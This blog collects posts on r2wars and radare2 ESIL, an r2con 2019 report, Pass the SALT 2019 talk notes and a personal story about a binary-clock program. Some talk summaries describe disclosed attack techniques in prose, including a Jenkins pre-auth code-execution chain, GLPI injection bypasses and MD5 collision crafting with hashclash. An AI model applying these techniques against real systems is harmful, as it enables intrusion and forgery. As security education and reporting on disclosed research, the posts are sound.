Since I had decided to leave my bot as-is for the last round, I took instead some time to fix the stmia behaviour in ESIL, and submitted a pull request even with tests this time !

It's quite simple, and if you want to contribute to radare2, you can look at these patches, and do the same thing for stmib, stmdb, stmdb or ldmia variants. You can look at one of the ESIL introductory talks to understand how it works.

Final results and notes

Tips

Here's what I learned from the r2wars competition: Measure the average throughput per cycles (in my case, it was 12, just like last year). Measure the cycles to first write (7 cycles), and the length of your bot's main loop (32 bytes). Test against real bots; you can look at my repo for an overview, but for best results, try the ones you competed with in a previous round ! Once you know your competitors, you can tune the bot style (static or mobile), your start position, what type of data you write (are you writing valid x86 opcodes?), where you start writing it, etc.

Results

So the last round came and ran. I hadn't modified the bot since last time, as I wasn't sure what to improve, and I was thinking it best to leave well enough alone. Was it a good decision? Lets find out:

It turns out it was: I arrived first ! Of course it was luck since neither me nor the cap decided to modify their bot.

Note that the cap arrived in the top 3 of the CTF and also co-won the r2 PwnDebian challenge !

I also learned that I was the only one to have copied and run simulation with the competitors' bots, so the "intelligence" I described above gave me a bit of an advantage :-)

r2wars future

As we saw before, the write throughput is an important metric. And since ESIL isn't cycle accurate compared to the architectures it emulates, anyone adding instructions with higher throughput to the ESIL machine would have a huge advantage.

So the only logical conclusions is to move to SIMD instruction sets. Once NEON and AVX-512 are implemented, it will make for much faster bots. NEON VSTM can write 128 bytes in one instruction for example. We'll see if people plan r2wars by adding instructions to ESIL in advance :-) If it happens, the organizers might need to change the rules: have a bigger arena, ban some instructions, or make them take more cycles (i.e put a write throughput cycle cap in ESIL).

I want to thank the organizers for the incredible turn-around after I reported an issue. The second day, r2wars runs moved from Windows to MAC, they added color legends in the corners, and it ran and timeout-ed faster !

r2con 2019

2019-09-06T00:00:00+02:00

I'm back in Barcelona for this year's edition of r2con. You can read my r2con 2018 report.

radare2 is debugging and reverse engineering toolkit. It's mostly used from the command line or through a programming interface (r2pipe) that is identical to the command line one.

Cutter

Cutter is the official graphical user interface for radare2. It's cross-platform (written in C++ with Qt), and built on top of radare2.

It has a dynamic graph view, a linear disassembly view, and an hexdump view for data, and other various widgets.

During the last year, plugin support was added as well as a graph overview, a theme editor, and many new translations and bug fixes.

A new entrant in the reversing landscape this year was Ghidra, a new tool with a particularly powerful decompiler. The decompiler part is now integrated directly into radare, with the r2ghidra-dec plugin. This plugin also works with cutter.

It allows exploring the decompiled C-code side-by-side with the disassembly, as well as import headers to decode struct accesses, etc.

Who you gonna' syscall ?

Grant's goal with this talk is to share how he improved with frida and r2 on iOS, to automate analysis of arm64 protected iOS apps that include anti-debug.

down the business with r2dwarf

Dwarf in this talk, is a Frida frontend, and a framework to allow debugging a target process with a GUI. r2dwarf is a pipe between Dwarn and r2. It wraps common Frida operations to make dynamic debugging and reversing easier.

Understanding ESIL emulation

ESIL in an emulator inside radare2. It's built on top of an intermediate language based on reverse polish notation.

The ESIL machine is based on infinite memory and registers. There are then bindings/aliases to map ESIL registers to the architecture-specific ones.

The ESIL machine is based on a set of instructions with a stack machine (using the polish notation). Every native instruction is converted into a "transformation", which is an ESIL string in polish notation.

Overview of the Linux threat landscape

An issue with Linux is the low visiblity of the threat landscape. At Intezer, the team discovered many new threats, from crypto-mining to trojans and botnets, some of them coming from nation-state actors.

As the landscape evolves, threat detection will improve, as well as the malware methods. The goal of the talk is to present a few of the techniques for defender awareness, in particular ELF tricks.

ELF parsing can be complex. Sections in binaries get loaded into memory segments depending on their types. A common obfuscation technique is to remove or scramble some sections. To workaround that is to simply, the best is to ignore or scrub scrambled sections when analyzing.

It's often possible to break a parser with just one byte modification, for example, by modifying the endianness of the file.

Another presented technique is to hide dynamic entries. It has been found is a lot of native objects packed in android malware. The technique uses a mismatch between the section offset, and the address that is used to map the segment in order to have a fake dynamic section, and a real one that will be mapped in memory.

Relocation hijacking uses the relocation features of ELF: there are usually well known and easy to detect, but it's possible to use a few tricks to avoid detection.

Pass the SALT 2019 live report (part 3/3)

2019-07-03T00:00:00+02:00

This year I'm at the Pass the Salt 2019 conferences. You'll find my part 1 and part 2 of my notes here.

Configurations, Do you prove yours ?

by Alexandre Brianceau (slides)

Alexandre went a bit more into details on the core concepts behind DevSecOps, and why continous configuration and observability are important to understand what's happening in an IT system and match compliance targets.

Rudder, while it started 10 years ago as an ops and reliability tool, now takes an approach to configuration management and observability focused on compliance, and is often used by SecOps teams.

What you most likely did not know about sudo…

by Peter Czanik (slides)

Most people do not know what sudo is (a prefix?) or what it can be used for, Peter says.

A basic rule set describes who can do what, where and as which user. But sudo also allows defining aliases and groups for each of these, making configuration less error prone.

sudo can modify or filter environment variables, or even spew insults on when someone types a wrong password, although it isn't enable by default. It's possible to add rules to verify integrity of binary before running it, or even record terminal sessions of sudo commands; although those sessions logs are easy to delete. Peter did a demo of this feature with the sudoreplay command that replayed a recorded session.

It has a plugin-based architecture, and there are many open source and commercial plugins for sudo. An interesting one is sudo_pair, which allows real-time approval of sudo commands by an admin user, coupled with live session viewing and control by the admin.

The configuration of sudo is interpreted from top to bottom, so one should put the most generic rules first, and exceptions at the end. It's possible to configure sudo through LDAP, allowing to have a remote-only configuration. Peter showed a sample sudoers file, where we can see the importance of the order of rules interpretation.

Logging

By default all logs are sent to syslog. Peter advises using central logging with sudo for analysis. It's possible to use syslog-ng for that, with a minimal configuration.

Since he works on syslog-ng, Peter showed an example of building a pipeline for sudo logs and alerting, and sending alerts to slack.

In conclusion, sudo is not just a prefix, but a very powerful and versatile tool.

Be secret like a ninja with Hashicorp Vault

by Mehdi Laruelle

Credentials sharing between persons or programs is often an issue in an enterprise environment. Hashicorp Vault attempts to solve this issue by providing controlled-access and encrypting "secrets".

There are different kind of secrets in Vault: static, key/value secrets; dynamic secrets (cloud…), and the ones that are encrypted on-demand.

Vault works by giving access to secrets to an application; the simplest way to use it, is to store static secrets in Vault, and giving access to apps that have the proper role. Then, one should make the secrets dynamic. Finally, sensitive data should also be encrypted, and vault provides a service to do that.

Mehdi did a demo showing how a simple service can access credentials to a database with Vault. The Vault app role id and secrets are passed through the environment, then the app uses those connects to Vault's API and get the DB credentials. This app also encrypted sensitive data with the Vault API before storing it in the DB. In this case, the DB username and passwords were generated dynamically by Vault. Then, using Vault web UI, Mehdi decrypted the data that was encrypted.

In conclusion, Mehdi says one should always attempt to implement the principle of least privilege, and Vault helps to do that.

Scale Your Auditing Events

by Philipp Krenn

Auditd is component that works with the linux kernel auditing system. It can be used to monitor network access, system calls, commands, etc. The raw logs are hard to understand, Philipp says. There are tools to show statistics, or search through the event with auditd, and it is well documented. Namespace support is still a work in progress though.

To centralize all of this, the Elastic stack can be used. There's a Filebeat module for Logstash for that, but it relies on regular expressions to parse the raw logs. That's why the Auditbeat module was built in order to get the structured information directly. It's implemented on top of go-libaudit. Philipp showed a few examples of Auditbeat configurations and what can be done with it.

Elastic SIEM is a new software that builds on top of the Elastic Common Schema(ECS) and Auditbeat in order to provide a high-level view with search capability on the events that are put into the Elastic stack.

Programming research: a missed opportunity for secure and libre software?

by Gabriel Scherer

Public research often picks a hard problem at attempts to solve that. But the produced software are most of the time unmaintained proofs of concept. The free software community also has hard problems to solve, and there a few collaborations between the academic community and free software community, like Coccinellle with the Linux kernel, but not enough, Gabriel says.

He showed a demo of a programming environment (Why3) made for writing correct programs and proving them.

There are static analyzers that can be very useful to rule out entire classes of failure. Annotations are good, Gabriel says, because they help both humans and tools alike. There a few success stories in that domain, like Astrée, that proved that there were no errors in Airbus flight control software.

Verified programming is the next step, were the annotations are used to prove the correctness, like it is done in Spark/Ada.

With proof assistants, the users write a full mathematical proof that is verified by the checker. The micro-kernel seL4 was proven this way for example.

Unfortunately, free software lacks adoption of those tools, and this is also the research community's fault Gabriel says. An easy way to fix that, is to use safer languages for new projects, citing modern C++ Rust as examples, and stop using C or PHP. A bit more work is required to try to adopt static-analysis tools. And finally, keeping up-to-date on programming research is also important, and funding programmers to go to academic conferences, or even collaborating with academia.

D4 Project - Design and Implementation of an Open Source Distributed and Collaborative Security Monitoring

by Alexandre Dulaunoy, Jean-Louis Huynen and Aurelien Thirion

An issue between organizations that want to share sensor information easily and automatically. One of the initial goal of the D4 project was to have flexibility on the type of sensor and the type of information that could be shared. The goal isn't to reinvent existing tools, but to build on top of them and providing sharing capability in the platform.

The D4 project was started in late 2018, so it's still very young, but it has been fully open from the start.

The monitoring protocol is very simple, and can be extended very easily to plug new data sources. The D4 server provides a web interface to browse the monitored data. The team showed a demo of the project, with various types of sensors (DNS, TLS) to show the powerful capabilities of the tool.

No IT security without Free Software

by Max Mehl

Free software provides four different freedoms: to use, study, share and modify a piece of software. Security in itself is a process, Max cites Bruce Schneier.

Security benefits from free software, through transparency: independent audits increase trust, Max says. Releasing code can be scary, but this is for the best: it pushes one to look closely at what is released when the code is available. Sharing synergies with the community and giving independence to users is also helps security.

Max went through a few of the arguments against making software free. He then cited the example of the Huawei 5G controversies, and how they could be solved by moving through free software, whether or not it's realistic in the short term.

Managing a growing fleet of WiFi routers combining OpenWRT, WireGuard, Salt and Zabbix

by Kenan Ibrović

Kenan's organization provides secure routers to journalists around the world. They want to manage their fleet of routers around the world, with no on-site technical support.

The routers are based on OpenWRT and use Wireguard to provide VPN access to the devices. SaltStack is used to manage the devices, which allows running commands on all the devices securely and remotely.

Salt node groups are used to organize the inventory. Pillars makes the states reusable, by storing per-device credentials, variables, etc. Zabbix is used to monitor the routers.

All the devices use a public VPN based on OpenVPN for the public connection, with a shared account. Since they don't have enough space on the devices, they use external USB flash drive with ExtRoot to store more data and install more apps.

When the device is updated, by default the apps are deleted, so they have a configuration script to do the reinstallation after updates or even after USB-unplug.

Better curl !

by Yoann Lamouroux

The curl project started in 1996 by Daniel Stenberg. It's composed of libcurl which has bindings in most languages, and the curl binary that installed on most OSes.

curl is stable and widely deployed. The most basic use is to fetch a URL and show the response body or headers with -v.

You can also use --trace-ascii to see the detailed transferred bytes. --trace-time will show detailed timing information when used with -v.

When you need to change the IP resolution it's possible to use the --resolve parameter. Yoann says there's no need to remember the parameters, you can put the options in your ~/.curlrc if you always use them. If you use browser dev tools, it has a "Copy as curl" feature which gives you a command line you can reuse.

It's also possible to generate C source code with the --libcurl option.

PatrOwl - Orchestrating SecOps with an open-source SOAR platform

by Nicolas Mattiocco

PatrOwl is an open source platform to automate security scans, for use in SecOps teams. It has pluggable connectors for data sources, with many already provided by default.

According to Nicolas, there's a growing set of challenges in cybersecurity. Automation and orchestration can help address them, but only if you do it properly, and at better scale than attackers. That's why PatrOwl was built. It integrates the best-of-breed scan tools to analyze a network.

Written in python3, it integrates multiple engines, by domain; these are applications or web services, like nmap or VirusTotal, that are used in various use cases. PatrOwl is currently looking for contributors and user feedback.

That's it for Pass the SALT 2019. Thanks to the team for organizing this event !

Pass the SALT 2019 live report (part 2/3)

2019-07-02T00:00:00+02:00

This year I'm at the Pass the Salt 2019 conferences. You'll find my part 1 of my notes and part 2 here.

Time-efficient assessment of open-source projects for Red Teamers

by Thomas Chauchefoin and Julien Szlamowicz (slides)

In their pentest team, Julien often does red team assessments with big scopes, often facing a blue team. The talk is a case study on the work they did assessing GPLI, and the methodology they used.

GLPI is a GPLv2 inventory tool often used by sysadmins, widely deployed in France and Brazil, which made it an interesting target.

In Red Team assessments, discretion is key, as opposed to traditional pentests, where noise does not matter as much. Thomas says the forensing footprint should be as low as possible. Therefore, a good Red Team vulnerability should be silent.

An aspect of assessing Open Source Software, is that you don't work with a blackbox, and it's easier to replicate an accurate environment in a lab. In this case, the attack surface that was analyzed is only comprised of non-authenticated code paths. PHP apps often have scripts that are directly accessible. They used an internal tool to help finding public-facing paths, as well as looked as previous GLPI vulnerabilities.

They didn't have semantic tooling, but used various hooks for DB queries, or low-level PHP functions, as well as profilers to do the analysis. They also wrapped $_GET and $_POST objects in order to have automatic analysis of bad usage.

The first issue they found was an infoleak, that exposed the various versions of GPLI, PHP, the OS. Then, they found an SQL injection, which wasn't immediately usable because the queries parameter were sanitized. This sanitization was still bypassable in a few cases, which they were able to do with another injection.

They then looked at the way the "Remember me" feature was implemented with json in a cookie. This allowed controlling the algorithm of password verification, therefore enabling a denial of service on the server. It also used PHP loose comparisons, which allows abusing string compare when a string starts with '0e' (see my writeup of 'La simplicité' in SIGSEGv1 CTF).

They also found a Local File Inclusion (LFI) issue in a query, which then allowed calling arbitrary functions.

The communication with GPLI maintainers was very smooth, and they were quick to react and apply patches, even if it took some time to arrive in released versions.

Hacking Jenkins!

by Orange Tsai (slides)

Jenkins is the most used CI/CD software in the world. It's a very interesting target, because it has access to source code, might have access to credentials, or compute nodes. It has been exploited in the wild.

The most common attack vector is a dictionary attack on the login page. Then, the previous known vulnerabilities, like previous deserialization bugs, of which there were many instances, because the initial fixes were blacklist-based. The serialization has since been rewritten to replace Java serialization with an HTTP API.

Orange then decided to review core Jenkins code, starting with the router. He found an issue with crafting URLs, that were mapped to class names and methods. But since access paths were whitelisted for non-authenticated users, he had to find a given path through whitelist objects in order to reach a dangerous invocation.

The next step, was to find another vulnerability to chain with in order to reach code-execution on the server. For this, he looked at Pipeline, a DSL built on top of groovy that allows doing reproducible, trackable in VCS Jenkins scripts.

Pipeline scripts must have a valid syntax in order to be interpreted: this is simple to do, but only path he found only did parsing, and no execution. To bypass that, Orange used Groovy meta-programming with the @Grab and @Asttest decorators that allowed to execute code. Finally, he found an issue in the @Grab implementation that allowed injecting a jar file by URL with @GrabResolver.

After the vulnerabilities were reported and fixed, new vulnerabilities were found by other researchers, to have a more generic entry points and ease exploitation. Unfortunately, public exploitation of these issues were common, including the infamous hack of the Matrix infrastructure, because many people were slow to update their Jenkins instances.

VLC Security

by Jean-Baptiste Kempf (slides)

VLC is the most popular video player, and its popularity comes from the fact that it can understand most video formats, even incomplete files. Jean-Baptiste estimates that it has more than 450 millions users, even there is no telemetry to have an exact count, because that would be "spying on users".

VLC has about 1 million line of codes, but lots(100+) of dependencies, which brings the total to more than 15 millions lines of code, include C, C++ and handcrafted ASM, of varying quality.

VLC development happens on mailing list, with relatively long review processes. Static and dynamic analysis is done by most developers. Fuzzing has been added recently. Hardening has started in 3.0, from PIE code to fixing most warnings of modern compilers, enabling ASRL, DEP etc.

The release process is very strict, with offline signing and very well defined steps.

Despite Jean-Baptiste's hate for bug bounties, VLC participated in the EU-FOSSAv2 program, with a twist: they decided to add bonuses for researchers that provided fixes. The result of this bug bounty were 31 security issues, with one classified as high. The program was successful in the end.

The best researchers were very good, but the worst were very bad going as far as insults or death threats. In general, half of the security reports are "total crap", Jean-Baptiste says. There's also a tendency to overblowing security issues: from bad CVSS scores to click-baiting articles. The evaluation of the impact is also very bad, since even very-hard to exploit issues are given up to 9.8 CVSS scores without PoCs. Jean-Baptiste followed with more examples of bad behaviour coming from parts of the infosec community.

A research project inside VLC is to put a sandbox inside VLC to segment the different parts of VLC to have different permissions; hopefully, this should improve the general security, but this is a complex endeavour.

OSS in the quest for GDPR compliance

by Aaron Macsween (slides)

Aaron started by saying he was filling in for Critina Delisle, the original author of the talk that couldn't make it.

Privacy and security are often "added at the end" of a project which doesn't work and has terrible consequences. And there's no single fix to this, since these domains are complicated, and often dependents. For both, one must evaluate what the threat model : what you're protecting, for how long, from whom, etc. In some cases, you need to chose between Privacy and Security.

An example, Aaron says, is that you might optimize for security by reducing privacy via surveillance: for example what you're bank does with financial transactions.

At the other end of the spectrum, you can optimize for privacy with less security, by having web services that have no authentication, like privacy pastebins, or mega's ciphered uploads for example.

Cryptpad, which Aaron is the lead developer of, is a real-time collaboration tool like Etherpad, but with encryption. The browser-based "thick" client is doing the most work, with an append-only log data structure on the server. It has many extensions, from read/write/delete features, to file-server capability, etc. It's used by various users in hackerspace or activist groups; it was funded with a grant from BPI France, the NLNet Foundation, and donations.

GDPR

The European privacy regulation has been in effect since May 2018, and has made Aaron's job much easier by raising awareness on the privacy issues, he says.

The strategy in Cryptpad is of data minimization, by reducing what's needed at a given moment, like the way cryptpad does peer-to-peer conflict resolution instead of server-based one.

The Data Protection Officer (DPO) role (Cristina's) can be adversarial, but always useful: it forces auditable traces around the handled data for example. The data controllers are the DPO's employers, the ones handling the data. And the data processors can be any third parties handling the data, like the hosting or payment processing companies.

Aaron says there still a few areas of uncertainty, like when a self-host becomes a data controller, or how to challenge the "legitimate use" that has a fuzzy definition in the law.

TLS 1.3: Solving new challenges for next generation firewalls

by Nicolas Pamart

Nicolas is presenting joint work with Damien Deville and Thomas Malherbe on how they adapted their firewall and IPS product to work with TLS 1.3.

The Intrusion Prevention System inside the proprietary Stormshield product does TLS analysis: it looks at the data in the Client Hello Server Hello handshake packets to get the client and server certificates. With TLS 1.3, it's no longer possible to get the Server Certificate just by looking at network traffic.

Since they didn't want to decrypt in order to stay passive, they elected to buffer the ClientHello and replay it once the connection was approved. In order to get the Server certificate, the IPS contacts the destination server with the same SNI and cipher list, but with its own KeyShare. It can then make a decision and replay the original ClientHello so that its connection can be established. A cache was added on top of that to have only one request per domain per time period.

In order to handle TLS 1.3 session resumption, in the case SNI isn't provided; there is also an SNI coherence layer, which is a cache of SNI presence.

In a response to a question, Nicolas said that encrypted SNI with DNSSEC might completely break this feature of the IPS.

Lookyloo: A complete solution to investigate complex websites - with a decent UI

by Quinn Norton and Raphaël Vinot (slides)

Lookyloo is an UI and visualize requests done in complex websites. It allows visualizing exactly which URLs are loaded when contacting a website. It's built on top Splash and the ETE toolkit.

When looking at a tree, you can see when a requests switches to insecure mode, or how many ads toolkit are loaded.

It can be used to detect when websites use a technique to bypass TLS mixed-content warnings, or when there are transparent HTTP meta redirects.

It can help popular sites analyze what resources are pulled by the single ad network code they put on their frontpage. Everytime you load a page, it might change, and lookyloo allows looking at the requests, saving them and analyzing it offline.

Quinn and Raphaël showed an example where a very popular website showed a GDPR warning, but still loaded dozens of resources before user consent was given.

Rump sessions

The rumps are five minutes talks on various subjects.

BPFCTRL

by Eloïse Brocas and Eric Leblond

bpfctrl is a new tool to analyze and manipulate eBPF maps loaded in the Linux kernel. Eloïse built it as wrapper on top of bpftool. It's higher-level and written in a mix of C and rust. It was missing in Suricata, to debug the traffic that was filtered.

$0.02 DNS Firewall with MISP

by Xavier Mertens (slides)

Xavier recommends using your own resolver, and log all queries, because everything goes through the DNS. With RPZ, it's possible to filter malicious domains by returning fake addresses.

There are plenty of malicious domain sources, but Xavier chose to use MISP, an incident response and sharing platform, to handle this list. A script does the extraction of malicious domains, which is then used by the bind configuration. Xavier posted about his configuration here

Gamebuino as a keyboard

by Antoine Cervoise (slides)

Antoine presented how he added keyboard functionality, to his Gamebuino, an open console based on Arduino, and used it to run automated commands, with different keyboard layouts supported.

RUDDER

by Alexandre Brianceau (slides)

Rudder is an open-source continuous compliance auditing et configuration platform.

Why fuzz Rust code ?

by Pierre Chifflier (slides)

Is the Rust memory safety and a test suite enough to ensure correctness ? Pierre says no, and every error should be handled properly without crashing. That's why rust code should be fuzzed. The cargo-fuzz crate can help for that, especially if you combine it with code coverage analysis.

Pierre says fuzzing is necessary, but neither sufficient, nor a starting point. You should also share the fuzzing corpus, because it has a lot of value.

Total recall

by Alexandre Dulaunoy (slides)

CIRCL does a lot of crawling of websites, including on Tor, where they take a lot of screenshots of webpages. They have a lot of data, but need to analyze it. Total recall is a tool to do large-scale image comparison and classification, to find phishing sites that look like popular websites.

A tool named Douglas Quaid has been released, as well as the CIRCL phishing dataset.

Psychological manipulation

by Simon Heilles (slides)

Simon goes over a few ways to manipulate humans. Understanding the different techniques is very useful to protects oneself.

That's it for part 2. Part 3 is continued here.

Pass the SALT 2019 live report (part 1/3)

2019-07-01T00:00:00+02:00

This year I'm at the Pass the Salt 2019 conferences. You'll find my notes updated in real time here.

Kill MD5

by Ange Albertini (slides)

Ange starts by saying that he does not know much about crypto, and he had help from Marc Stevens, a hash-collision cryptographer. This talk should provide a high-level overview.

A property of hashes is that you shouldn't be able to guess a hashed content from the hash value. This is still true, even for MD2, Ange says.

Hash collisions are separated in two types: identical-prefix and chosen prefix.

A collision is separated in 4 parts: the prefix, its padding, the collision block, and the suffix. Only the collision block changes between two collided files.

For a chosen prefix collision, the two prefixes can be completely different. It means the state of the hash function will be different in the two files when computing the collision blocks.

MD5

MD5 is mostly dead since 2008 when a practical attack was demonstrated.

To further prove this point, Ange computed a few demos colliding JPGs, executables, MP4s, GIFs, etc. He even went as far as doing a collision of four different file type for PoC||GTFO: PDF, PNG, PE and MP4.

There a few different algorithms to exploit MD5 collisions, with varying difficulty.

To craft a file that is collidable, the common approach is to have a comment in the file; in the collision block, the comment will mask a chunk that is isn't in the original file. In order to have a file format that isn't collidable, don't put comment in it, or remove comments before computing hashes.

To conclude, Ange said that MD5 isn't a cryptographic hash, but a toy function. Do not use it to compute hashes. His work was meant to prove the real-world feasibility of hash attacks.

Dexcalibur - automate your android app reverse

by Georges-B. Michel (slides)

An obfuscated Android app will usually be split in multiple .dex stages, first a packer, then a loader and then the payload. Only the first stage is usually available for static analysis, the rest is usually done dynamically, and can be very cumbersome.

That's why Georges started developing a toolkit in order to discover automate this process: Dexcalibur.

Dexcalibur integrates many tools: baksmali for disassembling, as well as file identifiers, parsers, static and dynamic code analyzers, and instrumentatioon with Frida. He added a modular heuristic search engine on top of that, as well a web UI.

The current limitations is that it can't hook native code on do symbolic execution of bytecode. To fix that, Georges intends to integrate radare2 in Dexcalibur in the future.

In a demo, Georges showed a crackme running in an emulator, and being analyzed in real-time in the Dexcalibur web UI. It works by extracting all the code present in an APK, then instrumenting it before running it. There are default hooks, for filesystem access for example. The code is then run, and at hook points, the analysis engine will evaluate a few rules in order to provide the most complete view of the reversed app possible.

As an example, if code is called dynamically (reflection), Dexcalibur will still update the cross-references (xref) in order to have a complete call graph.

Reversing a firmware uploader & other NFC stories

by Aurélien Pocheville (slides)

Aurélien started with a warning to always be careful when manipulating LF NFC tags. He once erased one by mistake when attempting to use a brand new proxmark.

The Chameleon Mini: Rev E is an NFC writer tool, that is widely available online. Unfortunately, it only worked with Windows, so Aurélien decided to reverse its loader in order to create a multiplatform free and open source solution. Since it was based on a reversed iceman tool, he thought it was just a case of finding an AES key. When launching the tool, it looked like a simple DFU programmer, but he didn't know that at the time.

In order to reverse the firmware builder, he started with Ghidra, a relatively recent RE and decompiling toolkit. Very quickly by looking at the code, he found an AES key, and attempted to decrypt the code with it. It wasn't successful. Afterwards, he looked again at the data-preprocessing, and after a two attempts, found that both the data was run through a rolling xor, and the key was used in decryption mode for encryption (and vice-versa).

Looking the flasher, he found that the AES was decrypted (in encryption mode), but the rolling-XOR was kept. On-device bootloader undid the rolling XOR.

In the end, he had a working solution, but it can still be improved.

He then presented a small puzzle with NFC tags controlling access to an apartment complex, which he cloned for a friend, but then ran into an anti-clone protection that triggered erratic behaviour.

Improving your firmware security analysis process with FACT

by Johannes vom Dorp (slides)

IoT devices are growing, and more and more devices are used as part of network attacks. FACT is a tool to help doing firmware analysis in order to improve security.

A typical firmware analysis, Johannes says, starts with unpacking. Then you'll gather information with the help of a tool in order to attempt identifying obvious weaknesses. Then, if there is nothing obvious, one should start doing reverse engineering. The goal of FACT is to automate the first three parts, leaving RE as a manual phase.

The initial goal in 2015 was to improve on binwalk, which mostly does extraction and discovery of files. The goal was to make a new tool with even more automated phases, and being as extendable as possible. FACT is still using binwalk for a lot of use cases, but its internal tools have also replaced it for many operations.

In addition to combining unpacking with various tools, FACt does parallel analysis, provides result visualization, a plugin system, and stores its results in a query-able database, which can be used for comparison or statistical analysis. Many statistics are already provided by default.

In a demonstration of the tool, Johannes showed how a binary can be found vulnerable to heartbleed in a router firmware, as well as the many generated statistics. In another, he showed the crypto material that was found in the image, in an executable; you can then search for other occurrences of the same key for example. There also various ways to do a search in all the firmwares: from a quick search, to an advanced one, to a raw mongodb query; it's also possible to search by yara rules.

The compare feature allows comparing two different versions of the same firmware for example, to find only what changed, or the common software. This can be used for example to find what bug was fixed in a given version. Or, in Johannes example, if a fix actually fixes the core issue.

cwe_checker: Hunting Binary Code Vulnerabilities Across CPU Architectures

by Thomas Barabosch and Nils-Edvin Enkelmann (slides)

Another tool is presented here, to automate a part of the vulnerability research tasks, with an accent on supporting multiple CPU architectures. In order to do that, cwe_checker works with an intermediate representation (IR), generated by BAP, an open source reverse engineering tool.

Nils says cwe_checker is inspired by clang-analyzer: it find potential bugs by looking for heuristics of varying complexity. It has a modular structure, and is written in OCaml, like BAP which it builds atop. CWE stands for Common Weakness Enumeration, and is named like that because each specific heuristic analyzer has a given number, and they check for various issues: integer overflow, null dereference, TOCTOU race, etc.

cwe_checker does symbolic execution BAP's Primus engine, although it can be time consuming, especially with path explosion. That's why it's only optional by default.

cwe_checker uses a variety of techniques; for integer overflow, it currently checks for instructions run before a malloc-family function, but other functions can be added. For NULL dereference, it has a list of function that can return NULL, and verifies if NULL is checked for in the return value with varied flow analysis in the IR.

FACT, presented in the previous talk, integrates cwe_checker. The project also provides integration with IDA Pro with python scripts.

In conclusion, Thomas says there are few false positives or negatives, so they want to improve the checks, but also add more checks and different type of analysis.

Unlocking secrets of the proxmark3 RDV4

by Christian Herrmann

Proxmark3 is the third iteration of a board designed for RFID research. It works at 125kHz, 13.56MHz, as well as contact tags. It's a versatile tool.

Recent high profile uses include an attack on the Tesla model S key fob that could be cloned with a Proxmark3; another one was the VingCard vulnerability, that affected 140 millions door locks.

The previous revision had a few issues, so a kickstarter was made to launch a newer, smaller, more powerful version. The new design allows for antenna customisation which is critical depending what tag you want to address, has onboard memory, etc.

The new version now supports chip-and-pin cards (ISO-7816), with an extension for snooping what happens in an exchange and run commands. It also has a bluetooth and battery add-on, allowing to use it wirelessly with a smartphone (if it had an Android/iOS app).

There's an ARM processor on board, and an FPGA on-board for RF processing. The command line tool has many different commands, as well as high-level lua scripts. It can work in standalone mode, or with client that does the computation or crypto attacks.

Workshop: Let’s play ColTris - understand and exploit hash collisions

by Ange Albertini

slides This workshop is an intro to hash collisions, and how to exploit each one with relation to file formats.

At first we used hashclash to compute md5 collisions with an empty prefix with the md5_fastcoll tool. Then we used a prefix we generated. These are identical prefix collisions.

Fastcoll is easy to do, but hard to use, because you need a file format where you can skip the identical random data in the collided blocks, but also use the modified bytes to have an effect on the files being different. For example, if the different bytes control the length of a comment block, then you can have variable comment blocks length, different on each of the two files, meaning they will be interpreted differently.

When you want to craft a reusable collision, you need to plan a header that will contain two files, depending on where the comment blocks are, and this way, with your two headers, you can generate two colliding files at will.

Next, we started using unicoll, with the poc_no.sh script in the hashclash tool set. This attack works by modifying only a single byte in the collision block; there is no padding, and only two bytes are modified, by being incremented. It takes longer to compute (a few minutes instead of seconds), but since the modified byte is only incremented, it gives more control when creating collisions with some file formats.

Using unicoll, it's possible to exploit the PNG file structure, by varying the byte size of a block in big endian: this gives you a jump of +0x100, more that enough to have varying data in the skipped chunk.

Next, Ange showed how to use fastcool with the GIF format in particular, which has a structure that allows using it. GIF is quite old, and its sublock and comment structure allows using fastcoll, which is very useful for computing fast collisions.

In the end, Ange explained the constraints of the chosen prefix attack, and how to implement it using the hashclash cpc.sh script. The length of the prefixes don't matter, but having a file format that tolerates appended data is important. It's this attack that Ange used to generate a reusable PE format collision. If block alignment is properly handled, it's possible to chain collisions, which can be used for mixing file types, or modifying content in a per-block fashion with unicoll.

That's it for part 1. Part 2 is continued here, and part 3 here.

How I traded my first software project 15 years ago

2019-06-26T00:00:00+02:00

2004

Gmail recently celebrated its 15 years anniversary, which led me down the path of how I got my first gmail invite. Back then, the private Gmail beta was all the rage. In the first few months, gmail invites were scarce. I got one by doing the most popular thing at the time: sending a postcard to a stranger. He was nice enough to send it right away, but the postcard took so long to arrive (2 weeks+) that he initially thought I had scammed him :-) That's how I was initially part of that name rush.

To get my second invite, I decided walking to a post office and spending ~2€ was a bit too much effort, so instead of a postcard, I went back to the gmail-invite exchanges and proposed something only I had: a small software project I had been writing on my free time: a binary clock.

I don't remember how I learned about binary clocks, but at the time, various existed in watch, alarm clock, or software form. As a student, I decided to put to use my freshly-learned C and SDL skills to rewrite one for my desktop.

I had been using it for a few weeks when I decided to trade this software in a gmail invite marketplace. I sent the windows build to a random stranger for a gmail invite. Fun fact: I remember it not working on the first try because it depended on the standard C runtime DLL (msvcrt.dll) which I didn't ship with it. I didn't know what a runtime or C library was back then, I just knew I had to ship SDL.dll and that it would work. I got my gmail invite and completely forgot about this binary clock after a few months.

Present day

I rediscovered this bit of code in my backups. It survived despite my backup strategy not being as safe as I'd like: there was only one copy for a long time. It's now multi-site and multi-copy, but I wouldn't mind one more of each.

Needless to say, the code was ugly, despite being a very simple project (less than 200 lines of C). But it still built and worked (mostly) as expected. SDL is truly a work of art, and with sdl12-compat, the projects based on it should continue to live on for a long time.

I fixed all the warnings given by modern gcc, passed it through automatic indenting, rewrote the makefiles, changed the newlines to unix ones, and am releasing it today. The stranger who received the windows build had a long enough exclusivity period :-).

Rewriting

As I am learning the Rust programming language with the Rust book, I thought this small project would be good idea for a rewrite, since it's simple enough. You can have a look at the code here as well.

There is an sdl2 crate, which allows calling the SDL2 library in safe Rust. The crate doc is good enough, and the crate itself has enough examples to start just by modifying some code. It took me some time to work out the image loading. The examples load pngs, which requires SDL_Image in C, or the "image" feature of the crate in Rust, which means I had to add that. This is clearly documented in the README, which I unfortunately managed to skip. But since I was loading bmps in the original code, it took me a while to realize that the load_bmp method from sdl2::surface::Surface would do the job, from which I could create a Texture for use in a Canvas.

While I expected this after reading so many examples from the Rust book, it's still surprising how much Rust ownership constraints forces you to structure your code in a different way in order to match the safety constraints. Luckily, I've found the rustc errors to be (mostly) explanatory, although the suggested solution wasn't always what I needed. Maybe this little program lacks depth, but it seems to me that the Rust team has taken to heart the initial criticisms that rustc errors were hard to grok.

